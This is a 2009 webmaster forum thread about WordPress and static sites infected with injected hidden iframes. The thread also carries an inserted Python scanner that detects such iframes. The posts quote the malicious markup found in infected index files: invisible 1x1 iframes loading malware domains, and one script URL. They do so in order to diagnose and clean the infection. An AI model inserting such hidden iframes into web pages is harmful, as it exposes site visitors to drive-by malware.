
My WordPress blog has an infection. I need help...

Discussion in 'General Chat' started by gauharjk, Apr 21, 2009.

  1. #1
    Whenever I go to my blog, my antivirus blocks access to it, citing a virus HTML/IFrame.gen.trojan.

    When I go to its feed, the message states an error with a code
    <iframe src="http://hotslotpot.cn/in.cgi?income65" width=1 height=1 style="visibility: hidden"></iframe>
    Code (markup):
    I don't know what that code is doing on my blog. I need some advice...

    P.S. I have wordpress 2.7.1 installed as CMS on the blog www.informationpile.com

    EDIT:

    Look at my index file... HELL........
    <?php
    /* Short and sweet */
    define('WP_USE_THEMES', true);
    require('./blog/wp-blog-header.php');
    
    echo "<iframe src=\"http://xtrarobotz.com/?click=BC0230\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
    
    echo "<iframe src=\"http://nipkelo.net/?click=E74A05\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
    
    echo "<iframe src=\"http://internetcountercheck.com/?click=14784531\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
    ?>
    <iframe src="http://hotslotpot.cn/in.cgi?income65" width=1 height=1 style="visibility: hidden"></iframe>
    <iframe src="http://hotslotpot.cn/in.cgi?income66" width=1 height=1 style="visibility: hidden"></iframe>
    <iframe src="http://hotslotpot.cn/in.cgi?income67" width=1 height=1 style="visibility: hidden"></iframe>
    <iframe src="http://betworldwager.cn/in.cgi?income68" width=1 height=1 style="visibility: hidden"></iframe>
    
    
    <iframe src="http://litecartop.cn/in.cgi?income70" width=1 height=1 style="visibility: hidden"></iframe>
    Code (markup):
    Now what! How did this happen???
     
    gauharjk, Apr 21, 2009 IP
  2. gauharjk

    #2
    Many files were infected... And this infection has spread to my other blogs as well... Very surprising... it is almost impossible to guess my FTP password. Maybe some plugin has been compromised and created a backdoor for the hackers.
     
    gauharjk, Apr 22, 2009 IP
  3. RadioBounce

    #3
    Maybe, but I never thought WP could get infected like that... you should only download certified plugins, meaning well-known ones and not Tom, Dick and Harry ones... good luck.
     
    RadioBounce, Apr 22, 2009 IP
  4. gauharjk

    #4
    I guess some other folks also have this same problem...

    http://wordpress.org/support/topic/264219

    All my blogs are hosted with dreamhost. I hope this is sorted out soon...

    EDIT: Oops... even my old-styled HTML sites have been hacked and virus code added to them. This seems like a server problem to me...
     
    gauharjk, Apr 22, 2009 IP
  5. Johnscore

    #5
    What I think is the one reason behind it: the plugin which you've downloaded is plugged with viruses!
     
    Johnscore, Apr 22, 2009 IP
  6. gauharjk

    #6
    I have a very limited number of plugins, mostly related to SEO. I have been using them for 2 years and never had a problem.

    But the surprising thing is even my websites which use no web 2.0 tech have been hacked. Websites hosted across different usernames have also been hacked. Some hard hack-bot at work, I guess. Dreamhost servers have been compromised.
     
    gauharjk, Apr 22, 2009 IP
  7. gauharjk

    #7
    http://blog.unmaskparasites.com/2009/04/15/malicious-income-iframes-from-cn-domains/

    The server was compromised due to copies of out-dated CMS. I have Joomla, WordPress & Gallery on the same server. I wonder how hack-bots gained entry into my account. They infect mainly index.htm or index.php files, located deep in the heart of your directories.

    Files that were hacked and virus code injected into them include
    wp-includes/default-filters.php
    themes/***/index.php
    And all index.php files.

    It is also advisable to check the wp-atom.php and wp-header.php files for any infection.

    To close all backdoors, all old backup copies of WordPress have to be removed. Static websites should be shifted to a different FTP account. If possible, it is advisable to segregate all websites and blogs into different accounts, because if one domain is hacked, all other websites could be compromised due to shared permissions.

    I have at least 7 websites compromised, including static HTML websites, WordPress, Joomla, Gallery and Drupal. I'm working to restore them and remove the infection...
     
    gauharjk, Apr 22, 2009 IP
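An added example, not from the thread or any poster, showing how a defender could sweep a web root for the injection pattern described in this post: it reads every index file plus the WordPress files named above and flags iframes that are hidden, tiny, or point at an in.cgi?income URL. The sample tree it builds is constructed, and example.invalid stands in for the real domains.

```python
import os
import re
import tempfile
# Injected iframes in this thread share traits: a 1x1 size, an inline "visibility:
# hidden" style, or a src ending in in.cgi?income<nn>. Each trait scores on its own,
# so a variant that drops one (the later 199x125 frame) is still reported.
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
# Quotes may be backslash-escaped, as inside the PHP echo "..." strings above.
SRC_RE = re.compile(r"""src\s*=\s*\\?["']?([^"'\s>\\]+)""", re.IGNORECASE)
TRAITS = {
    "hidden": re.compile(r"visibility\s*:\s*hidden", re.IGNORECASE),
    "tiny": re.compile(r"""(?:width|height)\s*=\s*\\?["']?[0-9]\b""", re.IGNORECASE),
    "income": re.compile(r"in\.cgi\?income\d+", re.IGNORECASE),
}
# Files the post names as infected, plus every index file in the tree.
WATCHED = {"default-filters.php", "wp-atom.php", "wp-header.php",
           "index.php", "index.htm", "index.html"}

def suspicious_iframes(text):
    """Map each suspicious iframe src in text to the list of traits it matched."""
    found = {}
    for tag in IFRAME_RE.findall(text):
        m = SRC_RE.search(tag)
        reasons = [name for name, rx in TRAITS.items() if rx.search(tag)]
        if m and reasons:
            found[m.group(1)] = reasons
    return found

def scan_tree(root):
    """Walk root and report {relative path: findings} for watched files only."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower() not in WATCHED:
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = suspicious_iframes(fh.read())
            if hits:
                report[os.path.relpath(path, root)] = hits
    return report

def demo():
    """Constructed sample tree (placeholder domain) with one injected index.php."""
    root = tempfile.mkdtemp()
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write('<?php require("./blog/wp-blog-header.php");\necho "<iframe src=\\"http://example.invalid/?click=X\\" '
                 'width=1 height=1 style=\\"visibility:hidden\\"></iframe>"; ?>\n<iframe src="http://example.invalid/'
                 'in.cgi?income65" width=1 height=1 style="visibility: hidden"></iframe>\n')
    return scan_tree(root)
```

Run scan_tree against the account's document root after restoring from a clean backup; a non-empty report means the injection is back and the FTP credentials are still being abused.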
  8. H3llas

    #8
    H3llas, Apr 23, 2009 IP
  9. gauharjk

    #9
    Thanks a lot for the link. The author said...
    Unfortunately, I don't have cPanel on my hosting account. But I have decided to reinstall a fresh copy of WordPress on all affected sites. I have also changed my FTP passwords... My only worry is that this infection could come back. This is a huge waste of time. One of my blogs has already been flagged by Google for spreading malware... :(

    Thanks again. I'll see what I can do to save it...

    Regards.........
     
    gauharjk, Apr 23, 2009 IP
  10. H3llas

    #10

    I had it on 8 sites. I cleaned my PC with NOD32. Changed all FTP system passwords. Cleaned all sites manually; for large Joomla sites I just brought back a backup. Removed all FTP programs from my PC, and got some with SFTP. After 15 days no trace of another infection. It looks like I am clean.

    btw, I am the author there :D

    I went crazy when people started calling me about what I did to their sites.

    I was lucky I noticed maybe 2 hours after infection.
     
    H3llas, Apr 23, 2009 IP
  11. gauharjk

    #11
    That is a nice blog... :)

    I suspect this was not caused by FTP programs (though it is a probability). There is little chance of my PC being infected by a keylogger or a worm.

    IMO, this was a result of old wordpress backup which could have vulnerabilities.

    I had 3 FTP usernames & passwords stored with CuteFTP. But only 2 were hacked. Both of them had Wordpress installations, while the third one had a static website, and it was not hacked. So, I suspect a vulnerable wordpress backup caused the problem...

    I am trying right now to remove old backup WordPress files and upgrade old CMS. I may have to remove it altogether and reinstall it if the infection returns.

    Thanks again... :)

    Cheers!
     
    gauharjk, Apr 23, 2009 IP
  12. H3llas

    #12
    Well, it is not a keylogger, it is a worm that picks up passwords from regedit or something...

    Of all my sites which are infected, here is their engine:

    4 sites - Wordpress
    1 site - Joomla
    2 sites - SMF
    1 site - Static html content

    I had all their passwords, as well as those of 15 other pages, in my WS FTP LE. I did not log in to any control panel. I did not type any password for over 3 months.
    The other 15 are not infected. Why is hard to say. Maybe I reacted quickly enough.

    On top of everything, these 8 sites are not on the same server. They are on 3 servers. On every server I have more sites and not a single one is infected.
     
    H3llas, Apr 23, 2009 IP
  13. gauharjk

    #13
    One more attack on my blog..

    
    94.247.2.195/jquery.js threat JS/Exploit.Agent.AGR trojan 
    Code (markup):
    Don't these hackers ever stop? What have I ever done to them?

    I can't find the virus code... Now what do I do?
     
    gauharjk, Apr 24, 2009 IP
  14. guniwan

    #14
    Hey, all my sites got hacked too, similar to that. I removed the link manually, but then it happened again today. Please help me, guys.

    Thanks

    Guniwan
     
    guniwan, May 27, 2009 IP
  15. H3llas

    #15
    1. First of all, change all your FTP passwords. If you don't do that then there is no chance that you get rid of this infection.

    2. Don't save the passwords in FTP on your computer. Ever.

    3. Clean your computer from the Worm that picks up your passwords.

    4. Bring back clean backup of your sites.

    I had this too, as I said 3 months ago, and I successfully cleaned my sites.
    My experiences, as well as some removal steps that you need to apply manually,
    are here

    http://www.sulumitsretsambew.org/iframe-worms-xtrarobotzcom-superbetfaircn-lotmachinesguidecn/

    http://www.sulumitsretsambew.org/iframe-worms/
     
    H3llas, May 28, 2009 IP
  16. gauharjk

    #16
    Not again! The iframe attacks are coming back to haunt me...

     <iframe src="http://combinebet.cn:8080/index.php" width=199 height=125 style="visibility: hidden"></iframe>
    Code (markup):
    This time on two static sites hosted on the same username. It had no other vulnerability.

    Only one thing - the FTP password was stored in CuteFTP. It is highly unlikely that the software was hacked by spyware and the password leaked. But right now there is no other clue as to why some sites were hacked and others not...
     
    gauharjk, Jun 4, 2009 IP
  17. jtpratt

    #17
    To keep your WordPress blog from being hacked, learn how you can lock it down and harden it with simple steps and free tools. This free WordPress Security Guide has everything you could ever want to know about securing and hardening WordPress sites (at no cost, using freely available tools).
     
    jtpratt, Sep 9, 2009 IP